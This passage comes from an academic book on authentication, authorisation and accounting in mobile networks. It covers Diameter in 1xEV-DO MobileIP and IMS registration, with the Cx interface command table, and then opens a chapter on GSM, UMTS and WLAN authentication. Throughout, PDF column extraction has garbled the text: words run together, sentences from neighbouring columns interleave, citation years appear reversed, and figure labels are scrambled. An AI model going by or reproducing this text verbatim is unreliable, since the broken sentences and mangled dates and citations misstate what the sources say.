be sent to summarize the pervious state. In case tunnelsitstrafficbacktoitshomeagentenablin
connection details are modified considerably, to maintain itsanIP address while moving (Perkins,
accounting Stop followed by an accounting Start 2002; Perkins & Calhoun, 2005).
message are sent. The later is case is widely used In 1xEV-DO architectures, the PDSN normally
in practice. plays the FA role (as well as the NAS role for
Diameter)andtunnelstheMN’straffictoitsHA.
The MN establishes a PPP tunnel to the PDSN
dIAMEtEr-bAsEd ArcHItEcturEs and broadcasts a registration request (RRQ).
Upon receiving the RRQ, the PDSN forwards it
As we have seen in the introduction section, there towards the AAA for authentication in a Diameter
are three network tiers: access, distribution, and AA-mobile-node-request (AMR) which includes:
core (see Figure 1). In this section, we analyze a Session-ID, MN Home Address, Home Agent
selected Diameter application in each tier. identity, and MN NAI (Calhoun, Johansson, et
al., 2005). Note that such authentication is needed
At the Access layer: 1xEv-do with a as the RAN may be operated by a different entity
translation agent from the Internet Service Provider (ISP) who owns
the PDSN, HA, and so forth. Thus, upon receiving
Figure 1 shows a simplified xEV- 1 DO network the Diameter AA-mobile-node-answer (AMA)
where radio network controllers (RNCs) authen- from the AAA server, the PDSN/FA establishes
ticate the mobile call through the RADIUS based a MobileIP tunnel with the HA to serve the MN’s

traffic and starts sending accounting HArequests to session key and reformats
extracts the MN-HA
the AAA server. the nonces generated by the HAAA according to
We know when a mobile node roams into a for- the MobileIP standard and encapsulates them in
eign network, the foreign network’s AAA usually the home-agent-MIP-answer (HAA) (Steps 5, 6).
acts as a proxy and forwards the Diameter requests The HAAA then creates an AMA which includes
pertaining to the roaming mobile node to its home the MN-FA session key as well as the reformatted
AAA (HAAA) server. Foreign mobile nodes are nonces from the HAA and forwards it towards the
simply recognized by the domains in their NAIs. PDSN. The PDSN eventually extracts the session
In these cases, the mobile node needs to establish key and sends a registration reply towards the MN
security associations with HA and/or FA. The (Steps 7-9). The mobile node derives the session
HAAA is an attractive element to assist a key keys using the provided nonces and the MN-AAA
distribution mechanism. The Diameter MobileIPv4 shared key. Afterwards, the PDSN generates ac-
application focuses on the role of the AAA as the counting requests ACRs) ( reflecting the user’s
key distribution element. As shown in Figure 8, activity (Steps 10-13). The HAAA may be further
the MN-AAA shared secret8 is used to generate used to maintain session information such that the
the MN-HA and MN-FA secrets. The FA adver- same session-ID is used after handovers (Calhoun,
tises itself and includes a random challenge and Johansson, et al., 2005).
the mobile node replies to the challenge using its
MN-AAA shared secret and formulates a registra- At the core: IP Multimedia
tion request (Steps 1, 2). The registration request subsystem (IMs) Interfaces
triggers an AMR at the PDSN to be eventually
forwarded to the HAAA (Steps 3, 4). The HAAA In the last few years, convergent networking
validates the request and derives the session keys architectures were widely discussed. The IMS
based on a combination of nonces and the MN- was proposed as a radio access agnostic core
AAA shared secret, then forwards the keys in a infrastructure that allows heterogeneous radio
home-agent-MIP-request (HAR) to the HA. The networks (e.g., WiMAX, 1xEV-DO, UMTS, WiFi)
Figure 8. AAA role in mobileIPv4 key distribution
visited network Home network
fA Advertisement & challenge
registration
2
Mobile request & Mn-AAA Pdsn Mobile IP Home
node registration tunnel Agent
fA
reply (HA)
Including:
Mn-fA nonce 9
Mn-HA nonce
AMr
10 session- HAr
Id=1234
8 13 fA challenge
Mn-HA-key
6
Mn Answer
Acr
HAA
AcA
AMA 3 5 MIP-reg-reply
4 AMr
Home diameter
visited network 11 Acr
AAA with
diameter AAA AcA 12
AMA
MobileIPv4
Mn-fA key
7
MIP-reg-reply

to communicate. As such, IMS offers unified processing and may perform various functions in
services and enables seamless connectivity to the security, compression, and policy enforcement
application servers (AS). In this section, we outline over the SIP messages. The Interrogating CSCF
the role of Diameter in an IMS-based network. In (I-CSCF) is used to facilitate the communication
IMS-based architectures users are granted a private among different operators. Operators have the
identifiernai@operatorA.com)
like( and multiple I-CSCF addresses listed in their DNS servers to
publicidentifiers e.
( g.,
john.smith@corporate.com, allow their I-CSCF to communicate with their
smith_family@home.com), offering users the peer I-CSCF in the other operator’s networks. The
capability of sharing business and personal con- I-CSCF normally proxies all SIP messages to the
tactinformation,forinstance.Theusers’ profiles
user’s Serving CSCF (S-CSCF). The S-CSCF is
are stored in the Home Subscriber Server (HSS). the element that inspects all user’s requests and
Note that the HSS here plays an authentication confirmsthattheyabidebyaccessrightsspecified
and authorization role (AA) and this immediately for that user. It also acts as a SIP router where it
implies the use of Diameter interfaces. determines whether the SIP message needs to be
Let us assume that user 1 roams into provider sent to one or more ASs before granting service
Y’s network and wishes to access a game service Camarillo
( & García-Martín, .)024 Note that
locatedinhis/herhomenetwork.Forthat, user
CSCFs first
1
communicate over the SIP-based Mw in-
needs to register with the home network through terface and that only I-CSCFs and S-CSCFs com-
operator Y’s infrastructure. As shown in Figure 9, municate with the HSS over the Cx interface (see
the first point of entry to the IMS network Table 1is
forthe
the Cx Diameter commands). The Cx
so-called Proxy Call Session Control Function (P- interface enables the S-CSCF to download users’
CSCF). The P-CSCF is responsible for SIP message profilesfromtheHSS.
Figure9.DiameterroleinIMSnetworkenvironments
Home network (operator x)
Hss1 11/sh Af
Hssn rf
12/Isc
rf
ccf
note that neither the slf 16/cx
nor the dx interface are s-cscf
clearly mentioned in the dx
3gPP2 IMs standards slf*
rf
Mw
dx
I-cscf
Mw
Acronyms
HA P-cscf IMs: IP Multimedia Subsystem
Af: Application Function
slf: Subscription Locator Function
ccf: Charging Collection Function
Hss: Home Subscriber Server
visited network (operator y) HA: Home Agent
P-cscf: Proxy-Call/Session Control Function
I-cscf: Interrogating-Call/Session Control Function
s-cscf: Serving-Call/Session Control Function
0
Table 1. The Cx interface commands
Source Destination Command-Name9 Abbreviation

I-CSCF HSS User-Authorization-Request UAR
HSS I-CSCF User-Authorization-Answer UAA
S-CSCF HSS Server-Assignment-Request SAR
HSS S-CSCF Server-Assignment-Answer SAA
I-CSCF HSS Location-Info-Request LIR
HSS I-CSCF Location-Info-Answer LIA
S-CSCF HSS Multimedia-Authentication-Request MAR
HSS S-CSCF Multimedia-Authentication-Answer MAA
HSS S-CSCF Registration-Termination-Request RTR
S-CSCF HSS Registration-Termination-Answer RTA
HSS S-CSCF Push-Profile-Request PPR
S-CSCF HSS Push-Profile-Answer PPA
The Dx interface, shown in Figure 9, is essen- In Figure 10, we utilize a subset of the Cx inter-
tially the same as the Cx interface. When an I-CSCF face commands to illustrate the IMS registration
wishes to locate the appropriate HSS that holds the process for a roaming user. Once IP connectivity
user’sprofilein ( ordertocontacttheis right S-CSCFthrough the MobileIP procedures,
established
for the user’s request), it communicates with the the MN commonly referred to as the user agent
subscription location function (SLF). The SLF is (UA) in IMS initiates a registration request towards
simply a Diameter redirect agent, which refers the the P-CSCF. The P-CSCF recognizes that the user
I-CSCF to the right HSS. Although this interface belongs to operator X, performs a DNS lookup for
is not clearly mentioned in (3GPP2 X.S0013-000- Operator X’s I-CSCF, and forwards the request
A, 2005), it can be simply viewed as a Diameter to the I-CSCF (Steps 1, 2). When the correspond-
redirect for a Cx request. ing I-CSCF receives the registration request, it
The Sh interface between the HSS and the AS contacts the HSS over Diameter using the UAR
serversfacilitatesretrievingthecommand. application specific
Since, the REGISTER request usually
user’sdata,updatingit,andreceivingcarries notifications
both the user’s public and private identi-
when it is changed on the HSS. S-CSCF and AF ties, the HSS validates that a roaming agreement
may generate accounting records and in this case exists with Operator Y and that the requestor is
such accounting records are sent over the Diameter- a valid user and returns a UAA to the I-CSCF
based Rf interface towards the charging collection (Steps 3, 4). The I-CSCF uses the information in
function (CCF). The CCF may reformat the billing the UAA to locate an S-CSCF and forwards the
records in the charging data record (CDR) format for registration request to it (Step 5). Upon receiving
further processing in the upstream billing system. the request, the S-CSCF issues a MAR towards the
It is noteworthy to mention that 3GPP2 X.S0013- HSS to obtain appropriate authentication vectors
000-A (2005) includes a 3GPP2 assigned interface to authenticate the user. The S-CSCF formats the
name or number of each interface, for example, response into a SIP response (401 Unauthorized)
16/Cx, along with the original IMS interface names. that carries a challenge (Steps 6, 7). Once the
However, the use of interface numbering seems to UA receives the response including a challenge
be inconsistent in 3GPP2 standards as in most of (Step 10), it immediately responds with another
the cases original names are only used (e.g., Cx registration message carrying a response for the
not 16/Cx).

Figure 10. Initial registration with IMS over the Cx interface
Mn P-cscf I-cscf Hss s-cscf

(uA)
1 rEgIstEr
2 rEgIstEr
3 uAr
uAA 4
rEgIstEr 5
MAr 6
7 MAA
401 unAutHorIzEd / 8
challenge
401 unAutHorIzEd 9
401 unAutHorIzEd / challenge
/ challenge
10
11 rEgIstEr
/ response 12 rEgIstEr
/ response
13 uAr
uAA 14
15 rEgIstEr / response
sAr 16
17 sAA
200 ok 18
200 ok 19
200 ok 20
supplied challenge (Step 12). Note that the I-CSCF short IMS registration walkthrough as well as from
may perform another UAR to obtain the assigned the previous sections, Diameter is envisioned to be
S-CSCF (Steps 13, 14) either because it is stateless one of the fundamental protocols used in the future
or it is another I-CSCF selected due to DNS load 3G/4G telecommunication infrastructures.
balancing. When S-CSCF receives the second
registration request, it validates the user’s response
(Step 15) and if successful, it issues SAR to HSS IssuEs And futurE trEnds
requesting its assignment for the user’s session and
requestingtheuser’sprofile.TheHSSassigns the
Many standardization and research efforts are un-
S-CSCF for the user’s session and sends the user’s derway to upgrade and enhance the current AAA
profile back to itstep ( .7)At
,61 this pointstep
( architectures to exploit the security and the scal-
18), the S-CSCF issues a SIP 200 OK message to abilitybenefitsofDiameterintheareasofsessio
the UA and once received (Step 20), the registra- management, mobility support, distributed online
tion process is complete. andoff-lineaccounting,andQoSassuranceforuser
For registered users, when the I-CSCF receives services over heterogeneous wireless networks.
a SIP INVITE request, it queries the HSS for the For instance, Eyermann, Racz, Stiller, Schaefer,
assigned S-CSCF using the LIR command. If the and Walter (2006) discuss possible enhancements
user’s profile is updated, the HSS informs the consistent accounting reporting in
to maintain
serving S-CSCF of this change by sending a PPR. heterogeneous multi-operator environments by
The HSS may terminate the user’s session by issu- introducing a new Diameter accounting applica-
ing a RTR message towards the S-CSCF (3GPP2 tion including new commands and AVPs to allow
X.S0013-005-A, 2005). As we can see from this sharing session context information. Moreover,

efforts to attain seamless translation between choice for the IMS architecture, but it also plays
RADIUS and Diameter are ongoing especially an increasingly important role in the three major
in the areas of matching requirements between network tiers, that is, access, distribution, and
RADIUS and Diameter and in the translation of core. We demonstrated the role of Diameter in
VSAs (Mitton, 2006). eachtierbymeansofsamplecallows fl inpractical
As the future telecommunication networks are 1xEV-DO network architectures. We concluded
expected to be based on IPv6, Diameter implemen- the chapter with a short summary of the current
tations over IPv6 were tested and some issues were and future trends related to the Diameter-based
identified(Lopez,Perez,Skarmeta,& The
. )05 2 AAA systems.
tests were conducted based on the Open Diameter10
implementation. Integrating Diameter with Mo-
bileIPv6 is also an active area in both IETF and rEfErEncEs
research. For example 3GPP2 X.P0047-0 (2006)
discusses possible enhancements for MobileIPv6 3rd Generation Partnership Project 2 (3GPP2)
to exploit the security features of the Diameter X.S0013-000-A. (2005). All-IP core network multi-
applications for MobileIPv6 tunnel setup. It also mediadomain—Overview(Ver. )1
(3GPP2: TSG X
proposes enhancing MobileIPv6 by using Diameter Series). Retrieved from http://www.3gpp2.com/Pub-
for dynamic selection of home agents.11 lic_html/specs/X.S0013-000-A_v1.0_051103.pdf
Finally, continuous efforts are being made to
establish a standardized framework for end-to-end 3rd Generation Partnership Project 2 (3GPP2)
QoSforservicesstartingfromthecalling X.S0013-005-A.
userat (2005). All-IP core network
the RAN and ending at the called party whether multimedia domain—IP multimedia subsystem
it is located on the Internet or on another cellular Cx interface signaling flows and message - con
network. 3GPP2 addresses such architectures in tents (Ver.(3GPP2:
)1 TSG X Series). Retrieved
the service based bearer control draft document from http://www.3gpp2.com/Public_html/specs/
(3GPP2 X.S0013-012-0, 2006). It is noteworthy X.S0013-005-A_v1.0_051103.pdf
to mention that Diameter is quickly being consid- 3rd Generation Partnership Project 2 (3GPP2)
ered to support many services. For instance Kim A.S0008-B v1.0. (2006). Interoperability - specifica
and Afifi) 302discuss
( the integration of GSMtion (IOS) for high rate packet data (HRPD) radio
SIM-based authentication with the AAA over access network interfaces with session control in
Diameter-EAP application. Moreover, 3GPP2 has the access network (3GPP2: TSG A Series). Re-
adopted Diameter architectures to support simple trieved from http://www.3gpp2.org/Public_html/
and multimedia messaging services (SMS and specs/A.S0008-B_v1.0_061019.pdf
MMS) in (3GPP2 X.S0016-101-0, 2006).
3rd Generation Partnership Project 2 (3GPP2).
X.P0047-0 v1.0. (2006). MobileIPv6enhancement.
suMMAry (3GPP2:Draft). Retrieved from http://www.3gpp2.
org/Public_html/Misc/X.P0047-0v0.5_VV_Due_
In this chapter we presented and discussed archi- 08_January-2007.pdf
tecture and protocols for AAA as one of the most 3rd Generation Partnership Project 2 (3GPP2)
important design considerations in 3G/4G telecom- X.S0011-005-C. (2006). cdma2000 wireless IP
munication networks. While many advances have networkstandard;AccountingservicesandGPP2 3
been made to exploit the benefits of the current
RADIUSVSAs (3GPP2: TSG X Series). Retrieved
systems based on the RADIUS protocol, we il- from http://www.3gpp2.org/public_html/specs/
lustrated its inherent security vulnerabilities. We X.S0011-005-C_v3.0_061030.pdf
then surveyed the details of the Diameter proto-
col and some of its applications. We showed that 3rd Generation Partnership Project 2 (3GPP2)
the Diameter protocol is not only the protocol of X.S0013-012-0. (2006). All-IP core network

multimedia domain—Service based bearer con- Camarillo, G., & García-Martín, M..)024( The
trol—Stage 2 (3GPP2:Draft). Retrieved from http:// 3G IP multimedia subsystem (IMS): Merging the
www.3gpp2.org/Public_html/Misc/X.P0013- Internet and the cellular worlds. John Wiley &
012_SBBC_Stage-2_VV_Due_11_Sept-2006.pdf Sons.
3rd Generation Partnership Project 2 (3GPP2) Eronen, P., Hiller, T., & Zorn, G. (2005). Diameter
X.S0016-101-0. (2006). Multimedia messaging ser- extensible authentication protocol (EAP) applica-
vice;MM1interface
0 basedondiameterprotocol tion (RFC 4072). Retrieved from http://www.ietf.
(3GPP2:Draft). Retrieved from http://www.3gpp2. org/rfc/rfc4072.txt
org/Public_html/SC/X.S0016-101-0_v1.0_060124.
Eyermann, F., Racz, P., Stiller, B., Schaefer, C.,
pdf
& Walter, T. (2006). Diameter-based accounting
Aboba, B. (2005). Re: End-to-end security in management for wireless services. In IEEE Wire-
RFC8.5 3 IETF Mail Archive, Message#01185. less Communications and Networking Conference
Retrieved from http://www1.ietf.org/mail-archive/ (WCNC’0)6 (Vol. 4, pp. 2305-2311).
web/aaa/current/msg01185.html
Fajardo, V., & Ohba, Y. (2006). Diameter base
Aboba, B., & Vollbrecht, J. (1999). Proxy chain- protocol details. In Theth 76 IETF meeting. San
ing and policy implementation in roaming (RFC Diego, CA. Retrieved from http://www3.ietf.org/
2607). Retrieved from http://www.ietf.org/rfc/ proceedings/06nov/slides/dime-3/dime-3.ppt
rfc2607.txt
Garcia-Martin, M., Ed., Belinchon, M., Pallares-
Aboba, B., & Wood, J. (2003). Authentication, Lopez, M., Canales-Valenzuela, C., & Tammi,
authorization and accounting (AAA) transport K. (2006). Diameter session initiation protocol
profile (RFC 3539). Retrieved from http://www. (SIP) application (RFC:4740). Retrieved from
ietf.org/rfc/rfc3539.txt http://www.ietf.org/rfc/rfc4740.txt
Braunöder, M. (2003). Plug and phone software. Hakala, H., Mattila, L., Koskinen, J.-P., Stura, M.,
Retrieved from http://samuel.labs.nic.at/at43/dic- & Loughney, J. (2005). Diameter credit-control ap-
tionary plication (RFC 4006). Retrieved from http://www.
ietf.org/rfc/rfc4006.txt
Calhoun, P., Bulley, W., & Farrell, S. (2002).
Diameter CMS security application. IETF: Kent, S., & Seo, K. (2005). Security architecture
DRAFT. Retrieved from http://www3.ietf.org/ for the Internet protocol (RFC 4301). Retrieved
proceedings/02mar/I-D/draft-ietf-aaa-diameter- from http://www.ietf.org/rfc/rfc4301.txt
cms-sec-04.txt
Kim, H., & Afifi, H..) 302 (Improving mobile
Calhoun, P., Johansson, T., Perkins, C., Hiller, T., authentication with new AAA protocols. In IEEE
& McCann, P. (2005). Diameter mobile IPv4 ap- International Conference on Communications
plication (RFC 4004). Retrieved from http://www. (ICC ’03) (Vol. 1, pp. 497-501).
Lopez, M., Perez, G., & Skarmeta, A. (2005). Im-
Calhoun, P., Loughney, J., Guttman, E., Zorn, plementing RADIUS and diameter AAA systems
G., & Arkko, J. (2003). Diameter base protocol in IPv6-based scenarios. In IEEE Proceedings of
(RFC 3588). Retrieved from http://www.ietf.org/ theth 91 International Conference on Advanced
rfc/rfc3588.txt Networking and Applications(Vol. AINA’0
( )5
2,
pp. 851-855).
Calhoun, P., Zorn, G., Spence, D., & Mitton, D.
(2005). Diameter network access server applica- Mitton, D. (2006). Diameter/RADIUS vendor
tion (RFC 4005). Retrieved from http://www.ietf. specificAVPtranslation. IETF:DRAFT. Retrieved
org/rfc/rfc4005.txt from http://internet-drafts.osmirror.nl/draft-mit-
ton-diameter-radius-vsas-01.txt

Perkins, C. (2002). IP mobility support for IPv4 Remote Access Dial In User Service (RA-
(RFC 3344). Retrieved from http://www.ietf.org/ DIUS): RADIUS is an AAA protocol defined in
rfc/rfc3344.txt RFCs 2865 and 2866.
Perkins, C., & Calhoun, P. (2005). Authentication,
authorization, and accounting (AAA) registration
keys for mobile IP (RFC 3957). Retrieved from EndnotEs
http://www.ietf.org/rfc/rfc4301.txt 1
MMD is defined in all-IP core network
Rigney, C. (1998). 2.4.10 Remote authentication dial- standards (TSG X series) found at http://
in user service (radius). Snapshot of the 41st IETF www.3gpp2.org/.
meeting. In Proceedings of the IETFMarch.89 1 2
Notice that the authentication and the au-
Retrieved from http://www3.ietf.org/proceedings/ thorization operations are not separated in
98mar/98mar-edited-79.htm RADIUS. In other words, to obtain a user’s
authorization set, user must be successfully
Rigney, C. (2000). RADIUS accounting (RFC 2866).
authenticated.
Retrieved from http://www.ietf.org/rfc/rfc2865.txt 3
UDP ports 1812 and 1813 are the standard ports
Rigney, C., Willats, W., & Calhoun, P. (2000). assigned for authentication and accounting
RADIUS extensions (RFC 2869). Retrieved from respectively.
http://www.ietf.org/rfc/rfc2869.txt 4
Inter-domainAAAtrafficcrossinguntrusted
networks such as in roaming scenarios is usu-
Rigney, C., Willens, S., Rubens, A., & Simpson, W.
ally secured by dedicated VPNs.
(2000). Remote authentication dial in user service 5
According to (Aboba, 2005, message 01185)
(RADIUS) (RFC 2865). Retrieved from http://www.
end-to-end security through Diameter CMS
(Calhoun, 2002) mentioned in the standard
Rosenberg, J., Schulzrinne, H., Camarillo, G., John- (Calhoun, 2003, RFC 3588) has been aban-
ston, A., Peterson, J., Sparks, R., et al. (2002). SIP: doned and resolved by the introduction of the
Session initiation protocol (RFC 3261). Retrieved DiameterEAPapplicationdefinedin(Eronen,
from http://www.ietf.org/rfc/rfc3261.txt 2005, RFC4702).
6
If a loop exists, the message is rejected with
Wikipedia. (n.d.). RADIUS. Retrieved from http:// a DIAMETER_LOOP_DETECTED error
en.wikipedia.org/wiki/RADIUS message
7
More complex procedures may apply in case
kEy tErMs of translation.
8
Loosely speaking the user’s password
9
Diameter: Diameter is a new AAA protocol These commands are based on the Diameter
presented in RFC 3588 to replace RADIUS. CxApplicationApplication-
( ID, )6 1 2 7=6 1
more details can be found in (3GPP2 X.S0013-
IP Multimedia Subsystem (IMS): IP multi- 005-A, 2005; 3GPP2 X.S0013-006-A,
media subsystem is an access agnostic architecture 2005).
proposed as a core technology for the next genera- 10
The Open Diameter project, located at [http://
tion services. www.opendiameter.org/], offers open source
C++ implementation of the Diameter base
One Carrier Evolution Data Only (1xEV-
protocol.
DO): 1xEV-DO is a CDMA2000 based cellular 11
Dynamic Home Agent (DHA) selection is
access technology proposed to support high rate
a method used to dynamically select home
data services.
agent based on the geographic location of the
user such that the network backhaul delay is
minimized.

Chapter XIII
Authentication, Authorisation,
and Access Control in
Mobile Systems
Josef Noll
György Kálmán
AbstrAct
Converging networks and mobility raise new challenges towards the existing authentication, authorisa-
tion, and accounting (AAA) systems. Focus of the research is towards integrated solutions for seamless
service access of mobile users. Interworking issues between mobile and wireless networks are the basis
for detailed research on handover delay, multi-device roaming, mobile networks, security, ease-of-use,
and anonymity of the user. This chapter provides an overview over the state of the art in authentication
for mobile systems and suggests extending AAA mechanisms to home and community networks, taking
into account security and privacy of the users.
IntroductIon service enables roaming terminals, which can ac-

cess services independently of the currently used
Today’s pervasive computing environments raise networking technology. Market players in both
new challenges against mobile services. In future areas transform into wireless service providers
visions, a converged user access network is pro- across access networks. Telecom provide packet
jected. This means, that one network will be used switcheddataandmobileservicesoverthefixed
to deliver different services, for example, broadcast network, while Internet service providers run voice
TV, telephony, and Internet. Composed from mo- over IP (VoIP) and video on demand (VoD) over
bile (e.g., Universal Mobile Telecommunications mobile networks.
System [UMTS]), wireless (IEEE 802.11, IEEE The changing environment also changes the
802.16, IEEE 802.20), and wired (cable, Asym- management plane of the underlying networks.
metric Digital Subscriber Line [ADSL]), these Providers on converged networks have to change
networks hide the border between the telecom, their accounting and billing methods and need to
broadcast, and computer networks. The common redefinetheirbusinessmodels.Whilecommercial
Authentication, Authorisation, and Access Control in Mobile Systems
players demonstrate early examples, research in family. Development efforts of the Internet and
the AAA area focuses on providing a backplane telecommunication world were united on EAP.
for the upcoming ubiquitous services run over This protocol family has the potential for becoming
converged networks. the future common platform for user authentica-
tion over converged networks. EAP is a universal
authentication framework standardised by IETF,
bAckground which includes the authentication and key agree-
ment (AKA) and Subscriber Identity Module (SIM)
The AAA methods employed in current networks methods. EAP-AKA is the standard authentication
were developed for a single type of network, result- method of UMTS networks.
ing in two different systems, one for telecommu- Beside the fundamental differences of com-
nication services and one for computer networks. munication and computer networks, mobility is
This chapter addresses AAA in global system for the key issue for both. Network services should
mobil communications (GSM) and UMTS and not only be accessible from mobile terminals, but
computer network solutions based on Internet they should be adapted to the quality of service
Engineering Task Force (IETF) standards. QoS)
( requirementsofamobile/wireless - link.Im
Thecomputernetworksprovideaunified AAA of AAA methods are of fundamental
provements
access, and research focuses on extending the exist- importance for mobility, providing fast handover,
ing methods to be suitable for telecommunication reliable and secure communications on a user-
services. Extensions for Remote Authentication friendly and privacy protecting basis.
Dial In User Service (RADIUS) and Diameter are
proposed. RADIUS is the current de facto standard subscriber Authentication in current
for remote user authentication. It uses Universal networks
Datagram Protocol (UDP) as transport. Authen-
tication requests are protected by a shared secret In GSM networks, the integrated AAA is used for
between the server and the client, and the client anytypeofusertraffic.Theauthenticationisjust
uses hash values calculated from this secret. The one way the user has to authenticate himself/herself
requests are sent in plaintext except for the user towards the network.
password attribute. The Diameter protocol provides To be more precise, the user is authenticated
an upgrade possibility as compared to RADIUS. with a PIN code towards the SIM in the mobile
While enhancing the security through supervised phone, then the device authenticates itself towards
packet transmission using the transmission control the network. Device authentication instead of user
protocol (TCP) and transport layer encryption authentication can hinder the upcoming person-
for reducing man-in-the-middle attacks, it lacks alised services because it is hiding the user behind
backward compatibility. the device. In UMTS, the authentication of the
Both methods have a different background. device is two-way. A device can also check the
The computer networks targeted the person using authenticity of the network with the help of keys
acomputerinafixednetworkenvironment, stored while
on the SIM.
mobile systems addressed a personal device in a Integration of the mobile authentication with
mobile network. Thus a challenge for telcos is to different external services is not widespread. The
enhance seamless network authentication towards telecom providers have some internal services,
user authentication for service access. Most com- which can authenticate the subscriber based on
panies are also Internet service providers (ISPs), the data coming from the network. Credentials
thiswouldbeanaturalunificationofcould their AAA
be basically the CallerID, the Temporary
systems. International Mobile Subscriber Identity (TIMSI)
A generic approach is taken by extension of or other data transformed with a hash function. Ac-
the Extensible Authentication Protocol (EAP) cess control and authorisation is more an internal

network task. Without considerable extension, the AAA In convErgEd nEtworks

current mobile networks are more islands than con-
necting networks in the area of AAA. Equipment A converged network carries several types of traf-
manufacturers are now recommending various IP fic and enables seamless information exchange
multimedia subsystem (IMS) solutions for mobile between different terminals, regardless of transport
providers in order to enable integrated and third medium. To enable converged AAA, research work
party service convergence and to enable multimedia is going on in different areas: enabling wireless
content over today’s networks. LAN (WLAN)-mobile network interworking,
AAA protocols employed in computer networks enhancing network mobility in wireless computer
are meant to provide services for authenticated networks, and reducing resource requirements in
users. Current single sign-on (SSO) protocols, cryptography.
like RADIUS, Diameter, or Kerberos provide the
identity of the user to third parties. SSOs can use Interworking between Mobile and
digitalcertificates,publickeyinfrastructure (PKI)
wireless networks
and other strong encryption methods. But, none of
them is able to provide such a complete solution Network convergence is most significant in the
like the integrated AAA of the mobile network. wireless environment, having to face varying
Computer network protocols lack the support for QoSmeasuresontheradiointerface,forexample,
fast mobility of moving clients and optimise re- propagation delay, variation of delay, bit error rate,
source usage for low bandwidth connections. error free seconds, distortion, signal to noise ratio,
With incorporating seamless authentication duration of interruption, interruption probability,
used in network internal services in telecom world time between interruption, bit rate, and throughput.
and SSO solutions provided by various protocols These parameters will depend on the user and ter-
fromcomputernetworks,aunifiedAAAsystem minal environment and underline that an optimum
will achieve a enhanced user acceptance and service access will have to use all available wireless and
security. In such a system, secure key storage and mobile connections. Leu, Lai, Lin, and Shih (2006)
tamper resistant handling is crucial. Smart cards for have provided the fundamental differences of these
keystorageandgenerationwillfulfilthe security
networks, summarised in Table 1.
requirements, but usage and distribution of the Increased demand for security has improved
smart cards is cumbersome. As most users have a the security on wireless links, resulting in Wi-
mobile phone, the SIM card is a candidate to be a Fi protected access (WPA) and WPA2 as draft
primary smart card used for AAA in a ubiquitous implementations of the IEEE 802.11i standard.
environment(Kálmán&Noll,.026) This standard aims at incorporating protocols of
Table 1. Comparison of cellular and WLAN networks
Cellular WLAN
Coverage Country-wide Local
Security Strong Depends on setup
Transmission rate Low High
Deployment cost High Low
License fee Very high No need
Construction Difficult Easy
Mobility support High Poor

Figure 1. Authentication in GSM and UMTS
the EAP family, especially transport layer security The use of the IEEE 802.1x standard allows
(TLS) and SIM. seamless authentication, since-preshared cer
Most cellular operators are now providing cates and key negotiation are provided to the cellular
WLAN services using the Universal Access Meth- network, where the user is already authenticated.
od (UAM) for authentication. UAM uses a layer With the use of digital certificates, the system i
3 authentication method, typically a Web browser getting closer to the preferred view of pervasive
to identify the client for access to the WLAN. systems, where the user and the service provid-
This raises the problem of mutual authentication, ers are mutually identified. Since these systems
which has been a problem also in GSM networks. authenticate the user towards several services,
By extending to EAP-SIM it would be possible to privacy is a primary concern. A possible solu-
enable SIM-based authentication in these environ- tion, recommended by Ren, Lou, Kim, and Deng
ments for SIM-enabled devices. (2006) has a secure authentication scheme while
Roaming between access providers is a sec- preserving user privacy.
ond issue. Since data between access points are In pervasive environments a user connected will
carried over an IP backbone, it is natural to use a experience seamless authentication to all services
network-based protocol such as Radius, suggested when connected through a SSO service. Malicious
by Leu et al. (2006). Transport encryption inside tracking of his/her behaviour or eavesdropping of
the backbone is indifferent from normal wired authentication messages can compromise the user
practice, hence out of scope for this chapter. In credentials. The SSO service has to be extremely
a converged network, where users can switch prudent when sending user-related information.
between mobile networks and WLAN services, Keeping a reasonable level of privacy, the system
a common AAA system has to be operational to should deal with questions in location privacy,
ensurecorrectoperation.Aunifiedbilling scheme anonymity, and confidentiality (Ren
connection
is proposed by Janevski et al. (2006), suggesting to et al., 2006). The recommendations are based on
use 802.1x on the WLAN side as shown on Figure blind signatures and hash chains. Using hash is
2. The mobile networks WLAN connection is sug- highly recommended, since a good hash function
gested through the RADIUS server used also for can provide good foundation for anonymous access
access control in 802.1x. and its resource needs are not too high for the cur-
rent mobile devices, as sometimes blind signatures

based on Rivest-Shamir-Adleman (RSA) scheme environment. Khara, Mistra, and Saha (2006) sug-
may be. In certain environments, the GSM inte- gest including a new node, called Serving GPRS
grated functions may also be used. Access Router. This entity acts as a gateway for
The user retains full control over authentica- theWLANtraffictoenterthegeneral - packetra
tion credentials when composing and generating dio services (GPRS) backbone and enable GPRS
authentication tokens like the identities suggested signalling to control WLAN. The new protocol set
by Chowdhury and Noll (2007). Initial service ac- eliminates the need of Signalling System 7 (SS7)
cess can be achieved showing one of these tokens in addition to the IP backbone. Khara et al. claim
aftermutualidentificationbetweenthat the service
this solution isand
superior in terms of speed and
the user. Based on these tokens, no user data can overhead compared to the RADIUS-based methods
be retrieved nor traced back. If all of the initial suggested previously. The main drawback is the
identification steps succeed, the exchange of the
need of special dual mode devices with a split IP
required credentials can proceed using a freshly layer, a solution which might not be practical hav-
negotiated session key. ing in mind the basis of 2.5 billion mobile phones
The base of most authentication techniques is available in the market.
a preshared key, delivered to the user device out- For mobile devices limited computational
of-band. Authentication can be done for example resources and battery power require an effective
in mobile phones by inserting a master private key AAA mechanism. Extension of the GPRS/UMTS
ontheSIMattheactivationofthecard (Kálmán
network could be potentially more expensive than
& Noll, 2006). deploying RADIUS authentication. Handover de-
A different approach is to extend the current lay caused by terminal mobility is an issue which
mobile network with additional elements to en- might favour GPRS/UMTS protocols.
able network integrated AAA also in an Internet
Figure 2. Integration of radius and mobile network authentication
0
Authentication in converged could be done in reasonable time if they are coop-

networks erating, but with introducing converged network
access, it is likely that the terminal moves between
From the data traffic’s point of view, the WLAN speedand UMTS networks and back in less
of the network’s internal routines does not play a than a minute. Session mobility, for example a
primary role, in VoIP and other sensitive services, VoIP call without interruption, cannot be achieved
QoSisakeyparameter.Delayreductioniscurrently using current protocols. The key is to reduce the
the topic having intensive focus. Interconnecting handoff delay in interworking networks. To reduce
mobile and IP networks for data traffic is not
delay insideathe UMTS network, Zhang and Fu-
challenge, since GPRS has an IP backbone, and jise (2006) show a possible improvement for the
UMTS is practically an IP network. Most of the integrated authentication protocol. One cause of
problems begin when the network has to provide the long delay is getting an authentication vector
a certain QoS in order to support service (AV) if the with
Serving GPRS Support Node (SGSN)
time-critical transmission, that is, voice or video and Home Location Register (HLR) are far away.
calls. Delay in the wired network can be reduced by While roaming, the AV consumption is higher, if
additional bandwidth to reduce collisions, alternate the terminal is moving frequently or it is producing
